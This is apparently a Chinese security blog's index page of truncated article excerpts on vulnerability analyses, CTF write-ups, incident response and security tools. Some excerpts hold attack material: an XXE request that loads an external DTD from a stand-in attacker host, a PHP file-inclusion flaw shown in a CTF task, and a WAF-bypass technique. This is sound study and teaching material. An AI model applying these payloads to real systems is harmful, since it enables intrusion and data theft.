个人总结的漏洞管理流程分享 渗透测试

个人总结的漏洞管理流程分享

一、概述 合适的漏洞响应可以尽快减少易受攻击的产品实例的数量,并减少针对易受攻击系统的攻击。 良好的漏洞管理流程的作用: 对组织: 提升漏洞修复效率 降低漏洞再次发生的可能性 漏洞修复建议知识库 降低整体安全风险 对用户: 降低用户个人信息暴露的风险 二、漏洞处理相关的标准和流程 2.1 ISO/IEC 29147 和 ISO/IEC 30111 漏洞批露标准ISO/IEC 29147: ...
最新
阅读全文
挖洞经验 | 一次对GitHub Wiki页面的把玩测试 渗透测试

挖洞经验 | 一次对GitHub Wiki页面的把玩测试

在做漏洞众测的时候,漏洞的定义其实是非常广泛的,就看你如何来看待它了,所以当目标项目相关的某项新功能新特点出现时,你可以仔细研究,结合实际进行一些安全分析。本文中,作者就针对GitHub Repository Wiki Pages页面做了一次类似的综合分析,综合形成了漏洞隐患进行了上报。 GitHub Repository Wiki Pages介绍 依照 Wiki 的定义,它是一种可以多人共同编辑的网页,每个人都可以在上面任意的修改页面数据,像百度百科和维基百科一样。GitHub也有Wiki页面?是的。 GitHub 用户创建每一个项目都有一个独立完整的 Wiki 页面,...
阅读全文
在Linux宿主机审计docker进程和网络连接 渗透测试

在Linux宿主机审计docker进程和网络连接

一、引言 docker容器已经被广泛应用到各大公司线上、测试等各种环境,在宿主机如何识别出docker进程、docker网络连接就成为一个困扰的问题,如果容器内部署相同的crond或ssh服务,在宿主机上执行ps命令发现一大堆相同名字进程,根本无法区分属于宿主机还是具体某个container;不过docker提供docker top container_id命令能看到具体某个container在宿主机进程pid相关信息,但没有办法直接列出全部container进程。同时在网络连接方面,在宿主机执行netstat命令, 看不到container连接状态。 本文开发的docker_uti...
阅读全文
Fibratus:一款功能强大的Windows内核漏洞利用和跟踪工具 神兵利器

Fibratus:一款功能强大的Windows内核漏洞利用和跟踪工具

今天给大家介绍的是一款名叫Fibratus的开源工具,广大研究人员可以使用这款功能强大的工具来进行Windows内核漏洞利用、挖掘与跟踪。 Fibratus这款工具能够捕捉到绝大多数的Windows内核活动-进程/线程创建和终止,上下文转换,文件系统I/O,寄存器,网络活动以及DLL加载/卸载等等。除此之外,所有的内核事件可以直接以AMQP消息、Elasticsearch簇或标准输出流的形式提供给用户。大家可以使用filaments(一款轻量级Python模块)来根据自己的需要去扩展Fibratus的功能,这也是Python生态系统给大家提供的便利之处。 工具安装 ...
阅读全文
从一道ctf题学习mysql任意文件读取漏洞 渗透测试

从一道ctf题学习mysql任意文件读取漏洞

题目分析 题目给出了源码 <?php define(ROBOTS, 0); error_reporting(0); if(empty($_GET["action"])) { show_source(__FILE__); } else { include $_GET["action"].".php"; } 可以文件包含,但是被添加了.php后缀。尝试%00截断、超长字符串截断均不成功。 注意到第一句代码,变量名为ROBOTS,联想到robots.txt。 访问后发现目录 User-agent:* Disallow:/install...
阅读全文
Metinfo 6.1.3 XSS漏洞分析 代码审计

Metinfo 6.1.3 XSS漏洞分析

前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/   前台漏洞分析( CVE-2018-20486) 通过在前台插入xss访问,然后会在后台触发xss,造成xss攻击。 漏洞的触发点在admin/login/login_check.php 这里加载了$commonpa...
阅读全文
ThinkPHP5核心类Request远程代码漏洞分析 渗透测试

ThinkPHP5核心类Request远程代码漏洞分析

一、漏洞介绍  2019年1月11日,ThinkPHP团队发布了一个补丁更新,修复了一处由于不安全的动态函数调用导致的远程代码执行漏洞。该漏洞危害程度非常高,默认条件下即可执行远程代码。启明星辰ADLab安全研究员对ThinkPHP的多个版本进行源码分析和验证后,确认具体受影响的版本为ThinkPHP5.0-5.0.23完整版。 二、漏洞复现 本地环境采用ThinkPHP 5.0.22完整版+PHP5.5.38+Apache进行复现。安装环境后执行POC即可执行系统命令,如图: 三、漏洞分析 以官网下载的5.0.22完整版进...
阅读全文
TrackRay:一个开源的微服务渗透测试框架 神兵利器

TrackRay:一个开源的微服务渗透测试框架

关于溯光 溯光(TrackRay)是一个由Java语言编写的服务式插件化渗透测试框架,项目是一个WEB服务,提供了调用插件和扫描的接口,并且使用了 Websocket 技术实现命令行风格交互,启动后只需要通过浏览器即可使用,有着多数开源渗透测试框架不具备的特点。 自更新 2.0 版本后,项目数据库采用嵌入式数据库hsqldb,使用 SpringBoot 框架开发,用maven管理依赖,使开发和使用更为简单方便。 特点 提供WEB服务接口; 使用只需要一个浏览器; 第一个使用Java集成MSF & AWVS的开...
阅读全文
CANalyzat0r :一款可以对专用汽车协议进行安全分析的强大工具 神兵利器

CANalyzat0r :一款可以对专用汽车协议进行安全分析的强大工具

今天给大家推荐的这款工具名叫CANalyzat0r,各位研究人员可以利用该工具对专用汽车协议进行安全分析。 CANalyzat0r的优势在哪? 1、 引入了新的安全分析机制; 2、 整合了多款安全工具的强大功能; 3、 模块化与可扩展性:可读取doc文件,可实现自己的分析机制; 4、 提供了有好的GUI界面; 5、 可使用数据库单独管理不同的项目; 6、 文档化:如果需要操作手册或技术支持信息,可查看doc文档; 工具安装与运行 1、 运行下列两条命令,将自动在当前路径下创建一个名为“p...
阅读全文
Linux内核本地提权漏洞预警分析(CVE-2019-8912) 渗透测试

Linux内核本地提权漏洞预警分析(CVE-2019-8912)

一、漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地提权漏洞CVE-2019-8912,漏洞影响范围较广。根据git中的commit信息可知,该漏洞出现在内核’crypto/af_alg.c’中的af_alg_release函数中,可以通过sockfs_setattr函数触发,漏洞类型是use after free,可以导致本地代码执行进行权限提升。 二、漏洞影响版本 Linux 2 .6 ~ linux 4.20.11 Red Hat Enterprise Linux 7,Package: kernel-alt...
阅读全文
Window应急响应(三):勒索病毒 渗透测试

Window应急响应(三):勒索病毒

0x00 前言 勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。自WannaCry勒索病毒在全球爆发之后,各种变种及新型勒索病毒层出不穷。 0x01 应急场景 某天早上,网站管理员打开OA系统,首页访问异常,显示乱码: 0x02 事件分析 登录网站服务器进行排查,在站点目录下发现所有的脚本文件及附件都被加密为.sage结尾的文...
阅读全文
Window应急响应(二):蠕虫病毒 渗透测试

Window应急响应(二):蠕虫病毒

0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序。 常见的蠕虫病毒:熊猫烧香病毒 、冲击波/震荡波病毒、conficker病毒等。 0x01 应急场景 某天早上,管理员在出口防火墙发现内网服务器不断向境外IP发起主动连接,内网环境,无法连通外网,无图脑补。 0x02 事件分析 在出口防火墙看到的服务器内网IP,首先将中病毒的主机从内网断开,然后登录该服务器,打开D盾_web查杀查看端口连接情况,可以发...
阅读全文
Window应急响应(一):FTP暴力破解 渗透测试

Window应急响应(一):FTP暴力破解

0x00 前言 FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。 0x01 应急场景 从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。查看Window安全日志,发现大量的登录失败记录: 0...
阅读全文
利用分块传输吊打所有WAF 渗透测试

利用分块传输吊打所有WAF

技巧1 使用注释扰乱分块数据包 一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理,可以把分块组合成完整的HTTP数据包,这时直接使用常规的分块传输方法尝试绕过的话,会被WAF直接识别并阻断。 我们可以在[RFC7230]中查看到有关分块传输的定义规范。 4.1. Chunked Transfer Coding The chunked transfer coding wraps the payload body in order to transfer it as a series of chunk...
阅读全文
Linux内核CVE-2017-11176漏洞分析与复现 代码审计

Linux内核CVE-2017-11176漏洞分析与复现

一、漏洞背景 Linux内核中的POSIX 消息队列实现中存在一个UAF漏洞CVE-2017-11176。攻击者可以利用该漏洞导致拒绝服务或执行任意代码。本文将从漏洞成因、补丁分析以及漏洞复现等多个角度对该漏洞进行详细分析。 二、漏洞分析 Posix消息队列允许异步事件通知,当往一个空队列放置一个消息时,Posix消息队列允许产生一个信号或启动一个线程。这种异步事件通知调用mq_notify函数实现,mq_notify为指定队列建立或删除异步通知。由于mq_notify函数在进入retry流程时没有将sock指针设置为NULL,可能导致UAF漏洞。 ...
阅读全文
警惕!WinRAR漏洞利用升级:社工、加密、无文件后门 渗透测试

警惕!WinRAR漏洞利用升级:社工、加密、无文件后门

背景 2019年2月22日,360威胁情报中心截获了首个利用WinRAR漏洞(CVE-2018-20250)传播木马程序的恶意ACE文件。并提醒用户务必对此高危漏洞做好十足的防护措施。 正如我们的预测,在接下来的几天内,360威胁情报中心截获了多个使用WinRAR漏洞传播恶意程序的样本,并且我们还观察到了多个利用此漏洞进行的APT攻击活动。可以明显的看到,攻击者针对该漏洞利用做了更精心的准备,比如利用WinRAR压缩包内图片列表不可预览来诱导目标极大概率解压恶意文件、将恶意ACE文件加密后投递、释放“无文件”后门等。 事实证明,利用该漏洞传播恶意程序的攻击行为正处在爆发的...
阅读全文
drupal8系列框架和漏洞动态调试深入分析 代码审计

drupal8系列框架和漏洞动态调试深入分析

前言 在drupal框架中,比较经典又离我们最近的莫过于18年的CVE-2018-7600这个漏洞了。但是通过本人阅读和学习过此漏洞分析文章的过程中,发现都是针对于此漏洞点的详细分析。相对于此框架运行流程不是很熟悉的人可能在阅读完后很难理解。 作为阿尔法实验室的一员,本人通过阅读框架相关文档与漏洞分析的相关文章和自己对框架源码的调试,对框架运行的流程有了进一步的了解。 在此把这些分享给大家,本文主要分为两大部分: 第一部分是对drupal框架流程的简介(这里主要针对8.x系列),让我们知道在symfony开源框架基础上的drupal框架是如何利用监听者...
阅读全文
使用本地DTD文件来利用XXE漏洞实现任意结果输出 渗透测试

使用本地DTD文件来利用XXE漏洞实现任意结果输出

本文我要向大家分享一个小技巧,即使用本地DTD文件来利用XXE漏洞从而实现任意结果的输出。 想象一下你有一个支持外部实体的XXE,但服务器的响应始终为空。在这种情况下,你有两种选择:基于错误和带外利用。 以下是基于错误的示例: Request <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></mes...
阅读全文
类型混淆漏洞实例浅析 代码审计

类型混淆漏洞实例浅析

类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。 本文通过IE类型混淆漏洞实例和Word类型混淆漏洞实例进行分析,来学习理解类型混淆漏洞原理。  实例一:IE/Edge类型混淆漏洞(CVE-2017-0037) 漏洞原因:函数处理时,没有对对象类型进行严格检查,导致类型混淆。 分析环境:Win7、IE11 分析工具:Windbg、od、IDA Pro 在PoC中定义了一个table,标签中定义了表id为th1,在boom()中引用,然后是setInterval设定事...
阅读全文